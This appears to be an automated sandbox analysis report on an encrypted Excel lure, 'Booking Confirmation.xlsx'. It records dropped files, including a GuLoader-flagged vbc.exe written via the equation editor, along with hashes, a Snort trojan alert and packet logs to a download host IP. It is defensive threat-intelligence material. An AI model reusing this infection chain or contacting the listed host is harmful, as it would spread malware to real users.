                SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                Malicious:false
                Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D602AD35.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):84203
                Entropy (8bit):7.979766688932294
                Encrypted:false
                SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                MD5:208FD40D2F72D9AED77A86A44782E9E2
                SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                Malicious:false
                Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D952E9B2.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):50311
                Entropy (8bit):7.960958863022709
                Encrypted:false
                SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                MD5:4141C7515CE64FED13BE6D2BA33299AA
                SHA1:B290F533537A734B7030CE1269AC8C5398754194
                SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                Malicious:false
                Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA8A5653.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):84203
                Entropy (8bit):7.979766688932294
                Encrypted:false
                SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                MD5:208FD40D2F72D9AED77A86A44782E9E2
                SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                Malicious:false
                Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4B4CA0B.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                Category:dropped
                Size (bytes):8815
                Entropy (8bit):7.944898651451431
                Encrypted:false
                SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                MD5:F06432656347B7042C803FE58F4043E1
                SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                Malicious:false
                Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7B97C3D.emf
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):648132
                Entropy (8bit):2.8124530118203914
                Encrypted:false
                SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                SHA1:F677467423105ACF39B76CB366F08152527052B3
                SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                Malicious:false
                Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                C:\Users\user\Desktop\~$Booking Confirmation.xlsx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\Public\vbc.exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):147456
                Entropy (8bit):5.822963661672907
                Encrypted:false
                SSDEEP:1536:zK7pvMMhAYlnYgtuELhUQwe6KjEw5bMNccnuMG5reMFbCJQ:zCBqg197dvjEw5yccw5r7d
                MD5:EE83942376EA5717149517FCC832AB9F
                SHA1:EC75B10C6EF046CB63EAA20470AC94529FB4873A
                SHA-256:B3498937A71913D7101FAFB04EB48A791106BEC97E21839B2E1BE8BB55A3F5FC
                SHA-512:431CDD7E43FD6A4C4DF862297EEBC42E9CB68909647B57288A63BFE036D9D0560CC0E97D759BDA096E1389E3CD18D243E627CCE692660E2A384BE430623B2551
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Virustotal, Detection: 29%, Browse
                • Antivirus: ReversingLabs, Detection: 9%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...@.`R.....................0............... ....@..........................P.......X..........................................(....@..0...................................................................(... ....................................text............................... ..`.data...x.... ....... ..............@....rsrc...0....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:CDFV2 Encrypted
                Entropy (8bit):7.995512213537402
                TrID:
                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                File name:Booking Confirmation.xlsx
                File size:1286656
                MD5:0ff57b2fd3fb489d3cca1e3de4fc98ea
                SHA1:48f428a33c81e6647c399a50a71e5ee03c1c2ef9
                SHA256:36e8b5e6839f88f144b51f690004f0464368d437d099fa74534fe1a6223a6ed2
                SHA512:d1373270a84b44e2cb3507cd5743ad4cd01b3ee868ac22810acb8922b0457a7f06e53fd9f3637744714ed778d6cb7709e04deac8ab82d1c9373309c3748f3aea
                SSDEEP:24576:3EABhEpaKxCPPlkiKLeUapEyKoomeKGjTVE2X4ldfvr1rd9Nxsa:tBhEwKx+KLe25mCX4zj1rdfxsa
                File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "Booking Confirmation.xlsx"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:False

                Streams

                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                General
                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                File Type:data
                Stream Size:64
                Entropy:2.73637206947
                Base64 Encoded:False
                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                General
                Stream Path:\x6DataSpaces/DataSpaceMap
                File Type:data
                Stream Size:112
                Entropy:2.7597816111
                Base64 Encoded:False
                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                General
                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                File Type:data
                Stream Size:200
                Entropy:3.13335930328
                Base64 Encoded:False
                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                General
                Stream Path:\x6DataSpaces/Version
                File Type:data
                Stream Size:76
                Entropy:2.79079600998
                Base64 Encoded:False
                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                Stream Path: EncryptedPackage, File Type: data, Stream Size: 1272808
                General
                Stream Path:EncryptedPackage
                File Type:data
                Stream Size:1272808
                Entropy:7.99982364057
                Base64 Encoded:True
                Data ASCII:. k . . . . . . . . 6 . . . g 9 , . . . . . m J t ' . # . . . 1 . . . @ . . . . [ . X s X . . . . . . . s _ B . . < . a . . . u . d . O & S . . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h
                Data Raw:d8 6b 13 00 00 00 00 00 f2 84 36 fc b8 ae 67 39 2c bc a5 c3 90 0f 6d 4a 74 27 ef 23 10 97 83 31 fb bc aa 40 a8 eb 15 cc 5b 88 58 73 58 12 d7 d5 e1 11 b0 99 73 5f 42 a1 8b 3c f5 61 94 06 a2 75 c0 64 17 4f 26 53 15 be a5 fc 74 a3 5d 72 0b 68 48 ee c1 53 65 4d 48 ab a5 fc 74 a3 5d 72 0b 68 48 ee c1 53 65 4d 48 ab a5 fc 74 a3 5d 72 0b 68 48 ee c1 53 65 4d 48 ab a5 fc 74 a3 5d 72 0b 68
                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                General
                Stream Path:EncryptionInfo
                File Type:data
                Stream Size:224
                Entropy:4.55277811381
                Base64 Encoded:False
                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . z . . G . . . . ( Q e . G . . ; . @ . . . . . . . n . d \\ x . . . . . . . . . . N v . . J . = . . . . . . . . . 1 . . . g . v ' . . . R
                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                06/14/21-08:54:14.406260TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22103.155.82.236

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 14, 2021 08:54:14.156445026 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:14.405617952 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.405777931 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:14.406260014 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:14.656141043 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.656167984 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.656182051 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.656198025 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.656356096 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:14.905258894 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905323029 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905342102 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905359030 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905376911 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905392885 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905411005 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905427933 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:14.905519009 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:14.905545950 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.154512882 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154535055 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154547930 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154563904 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154576063 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154588938 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154602051 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154696941 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154716969 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154731035 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.154748917 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.154756069 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154758930 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.154762983 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154772997 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154791117 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.154825926 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.154836893 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.156949997 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404176950 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404205084 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404230118 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404253960 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404279947 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404299021 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404301882 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404330969 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404340982 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404356956 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404380083 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404387951 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404403925 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404427052 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404434919 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404450893 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404464006 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404474974 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404499054 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404506922 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404525042 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404534101 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404550076 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404563904 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404575109 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404597998 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404604912 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404620886 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404634953 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404645920 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404670000 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404678106 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404695034 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404704094 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404721975 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.404733896 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.404783964 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.408304930 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.654445887 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654474020 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654486895 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654500961 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654512882 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654525042 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654541969 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654560089 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654575109 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654594898 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654613018 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654629946 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654645920 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654663086 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654679060 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654692888 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.654695988 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654714108 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654733896 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654747963 CEST8049167103.155.82.236192.168.2.22
